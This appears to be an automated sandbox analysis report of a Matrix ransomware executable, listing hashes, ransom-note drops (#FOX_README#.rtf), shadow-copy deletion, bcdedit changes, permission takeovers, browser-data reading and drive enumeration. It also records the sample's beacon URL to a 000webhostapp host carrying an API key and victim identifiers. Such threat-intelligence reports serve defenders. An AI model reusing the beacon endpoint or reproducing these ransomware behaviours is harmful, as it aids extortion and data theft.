matrix | 5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b

Analysis

max time kernel
4294181s
max time network
123s
platform
windows7_x64
resource
win7-20220223-en
submitted
05-03-2022 23:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
Size

1.5MB
MD5

bafc669bbbeecb46825d0970f4e134b5
SHA1

39d642ca982ddd4c36eb0561df5da2e03645581d
SHA256

5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b
SHA512

506d11288f5fb3e75663e3314add9253a4e237f8725f34d4c1fdec2bd467274fb5d16cac1ed241fb929e3786eb69d5507317443fcf1fad01cf7ed719e5437033

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Minesweeper\en-US\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\More Games\de-DE\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Public\Desktop\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\requests\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Mahjong\ja-JP\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Spades\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\FreeCell\ja-JP\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\ProgramData\Microsoft\MF\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\Documents\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jre7\lib\zi\America\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Backgammon\fr-FR\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
HTTP URL	4	http://fredstat.000webhostapp.com/addrecord.php?apikey=fox_api_key&compuser=GZAATBZA\|Admin&sid=LLW6Y6JuICh1EDNY&phase=[ALL]47F328A8747EADE8	Process not Found
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Mahjong\it-IT\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\ProgramData\Microsoft\Assistance\Client\1.0\ja-JP\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Checkers\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Public\Music\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\include\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Microsoft Games\SpiderSolitaire\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Public\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Users\Admin\Downloads\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#FOX_README#.rtf	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1772	bcdedit.exe
840	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	1628	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	7FvmLmKL64.exe

Executes dropped EXE 64 IoCs

pid	Process
884	NWJUqhnC.exe
612	7FvmLmKL.exe
1356	7FvmLmKL64.exe
1276	7FvmLmKL.exe
1332	7FvmLmKL.exe
852	7FvmLmKL.exe
1044	7FvmLmKL.exe
932	7FvmLmKL.exe
1120	7FvmLmKL.exe
808	7FvmLmKL.exe
1512	7FvmLmKL.exe
1044	7FvmLmKL.exe
1072	7FvmLmKL.exe
1748	7FvmLmKL.exe
1548	7FvmLmKL.exe
1412	7FvmLmKL.exe
1136	7FvmLmKL.exe
932	7FvmLmKL.exe
1120	7FvmLmKL.exe
640	7FvmLmKL.exe
1656	7FvmLmKL.exe
1816	7FvmLmKL.exe
364	7FvmLmKL.exe
840	7FvmLmKL.exe
640	7FvmLmKL.exe
280	7FvmLmKL.exe
1348	7FvmLmKL.exe
836	7FvmLmKL.exe
1772	7FvmLmKL.exe
1804	7FvmLmKL.exe
2028	7FvmLmKL.exe
1656	7FvmLmKL.exe
1136	7FvmLmKL.exe
1512	7FvmLmKL.exe
1712	7FvmLmKL.exe
1560	7FvmLmKL.exe
1204	7FvmLmKL.exe
304	7FvmLmKL.exe
976	7FvmLmKL.exe
808	7FvmLmKL.exe
1412	7FvmLmKL.exe
236	7FvmLmKL.exe
568	7FvmLmKL.exe
1748	7FvmLmKL.exe
1656	7FvmLmKL.exe
1276	7FvmLmKL.exe
1192	7FvmLmKL.exe
1512	7FvmLmKL.exe
556	7FvmLmKL.exe
1560	7FvmLmKL.exe
1164	7FvmLmKL.exe
1984	7FvmLmKL.exe
1332	7FvmLmKL.exe
1136	7FvmLmKL.exe
1192	7FvmLmKL.exe
600	7FvmLmKL.exe
556	7FvmLmKL.exe
224	7FvmLmKL.exe
1164	7FvmLmKL.exe
1096	7FvmLmKL.exe
1332	7FvmLmKL.exe
1276	7FvmLmKL.exe
1192	7FvmLmKL.exe
1512	7FvmLmKL.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\MoveUnlock.tiff	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001422f-69.dat	upx
behavioral1/files/0x000600000001422f-70.dat	upx
behavioral1/files/0x000600000001422f-71.dat	upx
behavioral1/files/0x000600000001422f-75.dat	upx
behavioral1/files/0x000600000001422f-76.dat	upx
behavioral1/files/0x000600000001422f-78.dat	upx
behavioral1/files/0x000600000001422f-79.dat	upx
behavioral1/files/0x000600000001422f-81.dat	upx
behavioral1/files/0x000600000001422f-82.dat	upx
behavioral1/files/0x000600000001422f-84.dat	upx
behavioral1/files/0x000600000001422f-85.dat	upx
behavioral1/files/0x000600000001422f-88.dat	upx
behavioral1/files/0x000600000001422f-89.dat	upx
behavioral1/files/0x000600000001422f-91.dat	upx
behavioral1/files/0x000600000001422f-92.dat	upx
behavioral1/files/0x000600000001422f-94.dat	upx
behavioral1/files/0x000600000001422f-95.dat	upx
behavioral1/files/0x000600000001422f-97.dat	upx
behavioral1/files/0x000600000001422f-98.dat	upx
behavioral1/files/0x000600000001422f-100.dat	upx
behavioral1/files/0x000600000001422f-101.dat	upx
behavioral1/files/0x000600000001422f-103.dat	upx
behavioral1/files/0x000600000001422f-104.dat	upx
behavioral1/files/0x000600000001422f-106.dat	upx
behavioral1/files/0x000600000001422f-107.dat	upx
behavioral1/files/0x000600000001422f-110.dat	upx
behavioral1/files/0x000600000001422f-109.dat	upx
behavioral1/files/0x000600000001422f-112.dat	upx
behavioral1/files/0x000600000001422f-113.dat	upx
behavioral1/files/0x000600000001422f-115.dat	upx
behavioral1/files/0x000600000001422f-116.dat	upx
behavioral1/files/0x000600000001422f-118.dat	upx
behavioral1/files/0x000600000001422f-119.dat	upx
behavioral1/files/0x000600000001422f-121.dat	upx
behavioral1/files/0x000600000001422f-122.dat	upx
behavioral1/files/0x000600000001422f-124.dat	upx
behavioral1/files/0x000600000001422f-125.dat	upx
behavioral1/files/0x000600000001422f-127.dat	upx
behavioral1/files/0x000600000001422f-128.dat	upx
behavioral1/files/0x000600000001422f-130.dat	upx
behavioral1/files/0x000600000001422f-131.dat	upx
behavioral1/files/0x000600000001422f-133.dat	upx
behavioral1/files/0x000600000001422f-134.dat	upx
behavioral1/files/0x000600000001422f-136.dat	upx
behavioral1/files/0x000600000001422f-137.dat	upx
behavioral1/files/0x000600000001422f-139.dat	upx
behavioral1/files/0x000600000001422f-140.dat	upx
behavioral1/files/0x000600000001422f-142.dat	upx
behavioral1/files/0x000600000001422f-143.dat	upx
behavioral1/files/0x000600000001422f-145.dat	upx
behavioral1/files/0x000600000001422f-146.dat	upx
behavioral1/files/0x000600000001422f-149.dat	upx
behavioral1/files/0x000600000001422f-148.dat	upx
behavioral1/files/0x000600000001422f-151.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
1652	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
1520	cmd.exe
612	7FvmLmKL.exe
920	cmd.exe
864	cmd.exe
1944	cmd.exe
704	cmd.exe
1496	cmd.exe
1844	cmd.exe
964	cmd.exe
1204	cmd.exe
1348	cmd.exe
1692	cmd.exe
1164	cmd.exe
556	cmd.exe
976	cmd.exe
1276	cmd.exe
364	cmd.exe
1772	cmd.exe
1600	cmd.exe
1660	cmd.exe
864	cmd.exe
836	cmd.exe
808	cmd.exe
1804	cmd.exe
1436	cmd.exe
1944	cmd.exe
1984	cmd.exe
988	cmd.exe
1548	cmd.exe
964	cmd.exe
1660	cmd.exe
1044	cmd.exe
968	cmd.exe
1916	cmd.exe
1724	cmd.exe
1548	cmd.exe
1660	cmd.exe
1532	cmd.exe
600	cmd.exe
1436	cmd.exe
224	cmd.exe
968	cmd.exe
840	cmd.exe
1724	cmd.exe
1136	cmd.exe
1988	cmd.exe
600	cmd.exe
1708	cmd.exe
224	cmd.exe
1436	cmd.exe
1096	cmd.exe
1804	cmd.exe
1276	cmd.exe
964	cmd.exe
1512	cmd.exe
1988	cmd.exe
1560	cmd.exe
1708	cmd.exe
1984	cmd.exe
1436	cmd.exe
1136	cmd.exe
1804	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
556	takeown.exe
236	takeown.exe
1136	takeown.exe
220	takeown.exe
1944	takeown.exe
1548	takeown.exe
976	Process not Found
1600	takeown.exe
2028	takeown.exe
1436	takeown.exe
1988	takeown.exe
1080	takeown.exe
1496	takeown.exe
1660	takeown.exe
840	takeown.exe
568	takeown.exe
568	takeown.exe
1664	takeown.exe
304	Process not Found
1232	takeown.exe
1848	takeown.exe
564	takeown.exe
1664	Process not Found
1376	takeown.exe
1656	takeown.exe
1748	takeown.exe
1748	takeown.exe
1532	takeown.exe
1588	takeown.exe
1548	takeown.exe
1664	takeown.exe
1372	takeown.exe
1332	takeown.exe
304	takeown.exe
640	takeown.exe
280	takeown.exe
1600	takeown.exe
1708	takeown.exe
1540	Process not Found
932	takeown.exe
1848	takeown.exe
1856	takeown.exe
1352	takeown.exe
1664	takeown.exe
1516	takeown.exe
1724	takeown.exe
1352	takeown.exe
1748	takeown.exe
1772	takeown.exe
1540	takeown.exe
1116	takeown.exe
204	takeown.exe
1660	takeown.exe
220	takeown.exe
1600	takeown.exe
280	takeown.exe
1548	takeown.exe
1412	takeown.exe
1412	takeown.exe
564	takeown.exe
1548	takeown.exe
808	takeown.exe
1080	takeown.exe
568	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\E:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\G:	7FvmLmKL64.exe
File opened (read-only)	\??\U:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\T:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\I:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\A:	7FvmLmKL64.exe
File opened (read-only)	\??\R:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\H:	5c322c7f3b22aa8c598a875dd9b28917fd1c5b8d20d12ca59cb4074af269269b.exe
File opened (read-only)	\??\B:	7FvmLmKL64.exe
File opened (read-only)	\??\I:	7FvmLmKL64.exe
File opened (read-only)	\??\N:	7FvmLmKL64.exe
